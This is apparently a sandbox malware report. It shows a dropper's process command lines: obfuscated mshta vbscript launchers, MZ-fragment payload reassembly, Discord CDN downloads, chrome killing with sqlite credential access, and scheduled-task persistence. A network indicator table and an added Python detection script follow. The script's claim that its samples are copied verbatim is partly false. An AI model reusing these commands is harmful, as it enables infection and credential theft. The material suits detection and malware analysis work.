C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe

"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""

C:\Users\Admin\AppData\Roaming\1112626.exe

"C:\Users\Admin\AppData\Roaming\1112626.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE ( CREaTeOBJeCT ( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\1112626.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\1112626.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0, trUE ) )

C:\Users\Admin\AppData\Roaming\211320.exe

"C:\Users\Admin\AppData\Roaming\211320.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Roaming\1112626.exe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "" =="" for %L In ( "C:\Users\Admin\AppData\Roaming\1112626.exe" ) do taskkill -IM "%~NxL" -F

C:\Windows\SysWOW64\control.exe

control.exe .\PcAKEO.F

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\PcAKEO.F

C:\Users\Admin\Documents\0TgdVaMVlWcbBmGmRMGxJ3IH.exe

"C:\Users\Admin\Documents\0TgdVaMVlWcbBmGmRMGxJ3IH.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe

..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE ( CREaTeOBJeCT ( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF ""/PGeb9DQls~acXsvr9DzE3PVM "" =="""" for %L In ( ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ) do taskkill -IM ""%~NxL"" -F " , 0, trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "/PGeb9DQls~acXsvr9DzE3PVM " =="" for %L In ( "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ) do taskkill -IM "%~NxL" -F

C:\Windows\SysWOW64\taskkill.exe

taskkill -IM "1112626.exe" -F

C:\Users\Admin\AppData\Roaming\6555363.exe

"C:\Users\Admin\AppData\Roaming\6555363.exe"

C:\Users\Admin\AppData\Roaming\1231861.exe

"C:\Users\Admin\AppData\Roaming\1231861.exe"

C:\Users\Admin\AppData\Roaming\3771250.exe

"C:\Users\Admin\AppData\Roaming\3771250.exe"

C:\Users\Admin\AppData\Roaming\2114247.exe

"C:\Users\Admin\AppData\Roaming\2114247.exe"

C:\Users\Admin\AppData\Roaming\329851.exe

"C:\Users\Admin\AppData\Roaming\329851.exe"

C:\Users\Admin\AppData\Roaming\8035666.exe

"C:\Users\Admin\AppData\Roaming\8035666.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" Vbscript: CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN ( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828711157309470/18.exe" "18.exe" "" "" "" "" "" ""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>TiSQ.G"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe -Y ..\VYGDVP.ly

C:\Users\Admin\AppData\Roaming\5341808.exe

"C:\Users\Admin\AppData\Roaming\5341808.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE ( CREaTeOBJeCT ( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\5341808.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\5341808.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0, trUE ) )

C:\Users\Admin\AppData\Roaming\679400.exe

"C:\Users\Admin\AppData\Roaming\679400.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Roaming\5341808.exe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "" =="" for %L In ( "C:\Users\Admin\AppData\Roaming\5341808.exe" ) do taskkill -IM "%~NxL" -F

C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe

..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE ( CREaTeOBJeCT ( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF ""/PGeb9DQls~acXsvr9DzE3PVM "" =="""" for %L In ( ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ) do taskkill -IM ""%~NxL"" -F " , 0, trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "/PGeb9DQls~acXsvr9DzE3PVM " =="" for %L In ( "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ) do taskkill -IM "%~NxL" -F

C:\Windows\SysWOW64\taskkill.exe

taskkill -IM "5341808.exe" -F

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828757600858142/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\PcAKEO.F

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\PcAKEO.F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" Vbscript: CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN ( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ) )

C:\Users\Admin\Pictures\Adobe Films\nNFzGY3rEEGDjITMe8Djxu8g.exe

"C:\Users\Admin\Pictures\Adobe Films\nNFzGY3rEEGDjITMe8Djxu8g.exe"

C:\Users\Admin\AppData\Local\Temp\is-MRE6R.tmp\nNFzGY3rEEGDjITMe8Djxu8g.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MRE6R.tmp\nNFzGY3rEEGDjITMe8Djxu8g.tmp" /SL5="$10404,506127,422400,C:\Users\Admin\Pictures\Adobe Films\nNFzGY3rEEGDjITMe8Djxu8g.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>TiSQ.G"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im AjW2kk0fyqYsAJo9tWM9KfZh.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe" & del C:\ProgramData\*.dll & exit

C:\Users\Admin\AppData\Local\Temp\28846\18.exe

18.exe

C:\Users\Admin\AppData\Local\Temp\is-PAD7H.tmp\lakazet.exe

"C:\Users\Admin\AppData\Local\Temp\is-PAD7H.tmp\lakazet.exe" /S /UID=2709

C:\Users\Admin\Pictures\Adobe Films\HlulqWBz8a9zsE6VDUWOipBs.exe

"C:\Users\Admin\Pictures\Adobe Films\HlulqWBz8a9zsE6VDUWOipBs.exe"

C:\Users\Admin\AppData\Local\Temp\28846\Transmissibility.exe

Transmissibility.exe

C:\Users\Admin\AppData\Local\Temp\C48F.exe

C:\Users\Admin\AppData\Local\Temp\C48F.exe

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe -Y ..\VYGDVP.ly

C:\Windows\SysWOW64\taskkill.exe

taskkill /im AjW2kk0fyqYsAJo9tWM9KfZh.exe /f

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "" "" "" "" "" "" "" "" ""

C:\Users\Admin\AppData\Local\Temp\C48F.exe

C:\Users\Admin\AppData\Local\Temp\C48F.exe

C:\Users\Admin\Pictures\Adobe Films\62nf1QfZnZBgBmfbNYQtBOHN.exe

"C:\Users\Admin\Pictures\Adobe Films\62nf1QfZnZBgBmfbNYQtBOHN.exe"

C:\Users\Admin\Pictures\Adobe Films\Ha9gXlhGWwGJxfMjgAQhtHFn.exe

"C:\Users\Admin\Pictures\Adobe Films\Ha9gXlhGWwGJxfMjgAQhtHFn.exe"

C:\Users\Admin\Pictures\Adobe Films\V3jNMH1ylQbvw88MBTOlnGUc.exe

"C:\Users\Admin\Pictures\Adobe Films\V3jNMH1ylQbvw88MBTOlnGUc.exe"

C:\Users\Admin\Pictures\Adobe Films\97EgE0NFBrxWbeB_jyyKm6w2.exe

"C:\Users\Admin\Pictures\Adobe Films\97EgE0NFBrxWbeB_jyyKm6w2.exe"

C:\Users\Admin\Pictures\Adobe Films\b20TIJmqcW5FHR9QYQn2ctA5.exe

"C:\Users\Admin\Pictures\Adobe Films\b20TIJmqcW5FHR9QYQn2ctA5.exe"

C:\Users\Admin\AppData\Local\Temp\is-I95G5.tmp\b20TIJmqcW5FHR9QYQn2ctA5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-I95G5.tmp\b20TIJmqcW5FHR9QYQn2ctA5.tmp" /SL5="$A0058,506127,422400,C:\Users\Admin\Pictures\Adobe Films\b20TIJmqcW5FHR9QYQn2ctA5.exe"

C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe

"C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe"

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\F4D8.exe

C:\Users\Admin\AppData\Local\Temp\F4D8.exe

C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe

"C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe" -u

C:\Users\Admin\AppData\Local\Temp\is-4AOKR.tmp\lakazet.exe

"C:\Users\Admin\AppData\Local\Temp\is-4AOKR.tmp\lakazet.exe" /S /UID=2709

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\F4D8.exe

C:\Users\Admin\AppData\Local\Temp\F4D8.exe

C:\Users\Admin\Pictures\Adobe Films\uuRwsRBBygyLfdc3r7TifpNf.exe

"C:\Users\Admin\Pictures\Adobe Films\uuRwsRBBygyLfdc3r7TifpNf.exe"
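
The process list above shows the same loader chain several times: cmd.exe writes a bare "MZ" header with echo|set /p, glues the remaining fragments onto it with copy /b, and hands the result to control.exe, rundll32 Shell32.dll,Control_RunDLL or msiexec -Y under a random extension, usually launched through an inline mshta vbscript: URI. The Python below is an added example written for this page, not code from the sandbox report or from any tool it names; the rule names, ATT&CK mappings and the "normal extension" list for the loaders are the editor's assumptions, and the sample command lines are copied from the process list above.

```python
"""Detector for the cmd.exe / mshta.exe LOLBin chains in the process list.

Added example, not part of the sandbox report. Rule names and ATT&CK mappings
are the editor's choices; sample command lines are copied from the page.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    attack: str          # ATT&CK technique the behaviour maps to (editor's mapping)
    pattern: re.Pattern


@dataclass(frozen=True)
class Finding:
    rule: str
    attack: str
    evidence: str


def normalize(cmdline: str) -> str:
    # The operator randomises letter case (cOPy /B /y, StArt, taskkill -IM) and
    # spacing; lower-casing and collapsing whitespace defeats both.
    return re.sub(r"\s+", " ", cmdline).strip().lower()


RULES = [
    # echo | set /p = "MZ" > file writes a bare PE header; copy /b then glues the
    # other fragments onto it, so the payload only exists whole after the copy.
    Rule("mz_header_write", "T1027", re.compile(r'set /p\s*=\s*"*mz"*\s*1?>')),
    Rule("binary_fragment_concat", "T1027", re.compile(r'\bcopy\b(?: /[by])+ \S+(?: ?\+ ?\S+)+')),
    # mshta running an inline vbscript: URI that shells out via WScript.Shell
    Rule("mshta_vbscript_shell", "T1218.005", re.compile(r'mshta\.exe.*vbscript\s*:.*wscript\.shell')),
    # control.exe / Control_RunDLL normally take a .cpl and msiexec -y a .dll;
    # here they are fed the reassembled blob under a random extension.
    Rule("lolbin_loader", "T1218", re.compile(
        r'(?:control\.exe|control_rundll|shell32\.dll",#44|msiexec(?:\.exe)? [-/]y) (\S+)')),
    # type/copy the binary to a new name, start the copy, kill the original
    Rule("relaunch_from_copy", "T1059.003", re.compile(r'(?:\btype\b|\bcopy /y) .*?&& ?start ')),
    Rule("schtasks_highest", "T1053.005", re.compile(r'schtasks /create .*?/rl highest')),
    # browser killed so its locked SQLite credential stores can be read
    Rule("browser_kill", "T1555.003", re.compile(r'taskkill .*?[/-]im "?chrome\.exe')),
    Rule("sqlite_via_rundll32", "T1555.003", re.compile(r'rundll32(?:\.exe)? .*?sqlite\.dll",global')),
    Rule("downloader_cdn", "T1105", re.compile(r'"/download" "(https?://[^"]+)"')),
    Rule("self_delete", "T1070.004", re.compile(r'timeout /t \d+ & del /f /q')),
]

LOADER_NORMAL_EXT = {"cpl", "dll", "msi"}   # assumption: what these loaders usually receive

# Copied verbatim from the process list on this page.
SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\cmd.exe" /q/r EChO | sEt /P = "MZ" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F',
    r'"C:\Windows\System32\mshta.exe" Vbscript: CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN ( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ) )',
    r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\PcAKEO.F',
    r'schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST',
    r'cmd.exe /c taskkill /f /im chrome.exe',
    r'rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global',
    r'C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828711157309470/18.exe" "18.exe" "" "" "" "" "" ""',
    r'"C:\Windows\System32\cmd.exe" /c taskkill /im AjW2kk0fyqYsAJo9tWM9KfZh.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe" & del C:\ProgramData\*.dll & exit',
    r'C:\Windows\system32\svchost.exe -k SystemNetworkService',
    r'"C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF "/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe") do taskkill /f -im "%~nXZ"',
]


def scan(cmdline: str) -> list[Finding]:
    norm = normalize(cmdline)
    findings: list[Finding] = []
    for rule in RULES:
        m = rule.pattern.search(norm)
        if not m:
            continue
        evidence = m.group(0)
        if rule.name == "lolbin_loader":
            target = m.group(1)
            name = target.rsplit("\\", 1)[-1]
            ext = name.rsplit(".", 1)[-1] if "." in name else ""
            if ext in LOADER_NORMAL_EXT:
                continue      # a loader fed its usual input type is not evidence on its own
            evidence = f"{target} (extension .{ext} is not cpl/dll/msi)"
        findings.append(Finding(rule.name, rule.attack, evidence[:120]))
    return findings


def reassembly_chain_present(cmdlines) -> bool:
    """True when header write, fragment concat and a LOLBin load are all seen:
    the full chain is the high-confidence verdict, not any single rule."""
    seen = {f.rule for c in cmdlines for f in scan(c)}
    return {"mz_header_write", "binary_fragment_concat", "lolbin_loader"} <= seen


def triage(cmdlines) -> dict[str, list[str]]:
    """Deduplicated evidence per rule across a set of command lines."""
    out: dict[str, set[str]] = {}
    for c in cmdlines:
        for f in scan(c):
            out.setdefault(f.rule, set()).add(f.evidence)
    return {k: sorted(v) for k, v in sorted(out.items())}


if __name__ == "__main__":
    for rule, items in triage(SAMPLE_CMDLINES).items():
        print(rule, "->", items)
    print("full reassembly chain:", reassembly_chain_present(SAMPLE_CMDLINES))
```

Every rule runs on the case-folded, whitespace-collapsed line because the command lines in this report vary letter case and spacing on each invocation; a rule keyed on the literal strings seen once would miss the next run. The loader rule deliberately ignores control.exe or msiexec given a .cpl/.dll/.msi, so it fires on the reassembled blob and not on routine Control Panel use.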

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 149.28.253.196:443 www.listincode.com tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 45.144.225.243:80 45.144.225.243 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 8.8.8.8:53 g-localdevice.biz udp
US 8.8.8.8:53 hh3valve.com udp
US 194.195.211.98:80 hh3valve.com tcp
US 8.8.8.8:53 webdeadshare24.me udp
US 104.21.60.86:443 webdeadshare24.me tcp
US 8.8.8.8:53 iplogger.org udp
DE 5.9.162.45:443 iplogger.org tcp
DE 5.9.162.45:443 iplogger.org tcp
US 8.8.8.8:53 time.windows.com udp
US 8.8.8.8:53 staticimg.aieeaag.com udp
FR 91.121.67.60:51630 tcp
NL 20.101.57.9:123 time.windows.com udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 45.144.225.243:80 45.144.225.243 tcp
US 8.8.8.8:53 g-localdevice.biz udp
NL 212.193.30.29:80 212.193.30.29 tcp
US 8.8.8.8:53 webdatingcompany.me udp
US 104.21.50.241:443 webdatingcompany.me tcp
DE 5.9.162.45:443 iplogger.org tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.204.112:443 t.gogamec.com tcp
SC 185.215.113.45:80 185.215.113.45 tcp
SC 185.215.113.45:80 185.215.113.45 tcp
US 8.8.8.8:53 feeds.feedburner.com udp
US 142.251.39.110:443 feeds.feedburner.com tcp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 8.8.8.8:53 mastodon.online udp
FI 95.216.4.252:443 mastodon.online tcp
DE 5.9.162.45:443 iplogger.org tcp
US 8.8.8.8:53 host-file-host0.com udp
US 8.8.8.8:53 l-farlab.com udp
US 162.213.251.105:443 l-farlab.com tcp
DE 5.9.162.45:443 iplogger.org tcp
DE 5.9.162.45:443 iplogger.org tcp
NL 45.144.225.243:80 45.144.225.243 tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
NL 212.193.30.29:80 212.193.30.29 tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
NL 2.56.59.42:80 2.56.59.42 tcp
US 8.8.8.8:53 privacytoolzfor-you7000.top udp
US 47.254.33.79:80 privacytoolzfor-you7000.top tcp
US 47.254.33.79:80 privacytoolzfor-you7000.top tcp
NL 193.56.146.36:80 193.56.146.36 tcp
US 8.8.8.8:53 www.asbizhi.com udp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 8.8.8.8:53 lacasadicavour.com udp
RU 212.193.50.94:80 lacasadicavour.com tcp
NL 103.155.93.165:80 www.asbizhi.com tcp
US 8.8.8.8:53 dataonestorage.com udp
RU 212.193.50.94:80 lacasadicavour.com tcp
US 8.8.8.8:53 tg8.cllgxx.com udp
US 85.209.157.230:80 tg8.cllgxx.com tcp
US 8.8.8.8:53 inchtagbed667834.s3.eu-west-1.amazonaws.com udp
IE 52.218.80.91:80 inchtagbed667834.s3.eu-west-1.amazonaws.com tcp
US 8.8.8.8:53 charirelay.xyz udp
LV 94.140.112.68:81 charirelay.xyz tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 172.67.204.112:443 t.gogamec.com tcp
DE 5.9.162.45:443 iplogger.org tcp
US 8.8.8.8:53 statuse.digitalcertvalidation.com udp
US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 8.8.8.8:53 host-file-host0.com udp
IE 52.218.80.91:443 inchtagbed667834.s3.eu-west-1.amazonaws.com tcp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 8.8.8.8:53 toa.mygametoa.com udp
US 8.8.8.8:53 toa.mygametoa.com udp
KR 34.64.183.91:53 toa.mygametoa.com udp
DE 5.9.162.45:443 iplogger.org tcp
NL 193.56.146.64:65441 tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 host-file-host0.com udp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 194.195.211.98:80 hh3valve.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 g-localdevice.biz udp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 8.8.8.8:53 freshstart-upsolutions.me udp
